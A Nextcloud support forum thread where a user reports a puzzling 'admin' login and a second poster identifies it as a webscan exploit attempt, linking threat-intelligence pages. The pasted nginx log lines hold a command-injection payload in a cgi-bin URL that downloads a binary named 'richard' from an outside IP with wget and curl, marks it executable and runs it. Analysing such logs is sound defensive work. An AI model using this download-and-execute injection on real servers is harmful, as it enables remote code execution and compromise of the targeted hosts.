Unauthorized login to an "admin" account that does not exist

Support intro

Sorry to hear you’re facing problems :slightly_frowning_face:

help.nextcloud.com is for home/non-enterprise users. If you’re running a business, paid support can be accessed via portal.nextcloud.com where we can ensure your business keeps running smoothly.

In order to help you as quickly as possible, before clicking Create Topic please provide as much of the below as you can. Feel free to use a pastebin service for logs, otherwise either indent short log examples with four spaces:

example

Or for longer, use three backticks above and below the code snippet:

longer
example
here

Some or all of the below information will be requested if it isn’t supplied; for fastest response please provide as much as you can :heart:

Nextcloud version (eg, 12.0.2):16.04
Operating system and version (eg, Ubuntu 17.04):18.04.02
Apache or nginx version (eg, Apache 2.4.25): nginx 1.17.0
PHP version (eg, 7.1): PHP 7.3.8

The issue you are facing:
In logwatch (nextcloud / httpd) I saw successful login to the admin account. There was never such an account on Nextcloud and on the host. The host has fail2ban, spamhouse and GeoIP security. How is this possible ? Could this be a vulnerability in Nextcloud or Nginx?
LOG

Is this the first time you’ve seen this error? (Y/N):Y

nginx access.log

54.39.209.227 - admin [18/Aug/2019:01:06:17 +0200] “GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget hxxp://185.164.72.155/richard; curl -O hxxp[:]//185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1” 400 150 “-” “-”

54.39.209.227 - - [18/Aug/2019:16:32:43 +0200] “POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1” 410 136 “hxxp://10.0.0.1/network_diagnostic_tools.php” “”

54.39.209.227 - - [18/Aug/2019:16:32:43 +0200] “72.155/richard; curl -O hxxp://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4” 400 150 “-” “-”

I just saw a similar log entry on a webserver of mine (not running Nextcloud):

5.39.37.10 - admin [26/Aug/2019:09:51:12 +0200] "GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget hxxp://185.164.72.155/richard; curl -O hxxp://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1" 400 182 "-" "-"

I think it’s an attempt to exploit a webserver vulnerability by trying to download and run a kind of malicious script. In my case, the source address belongs to an OVH server included in a webscan campaing: https://otx.alienvault.com/indicator/ip/5.39.37.10

The target address from which they try to download the file seems unresponsive: https://otx.alienvault.com/indicator/ip/185.164.72.155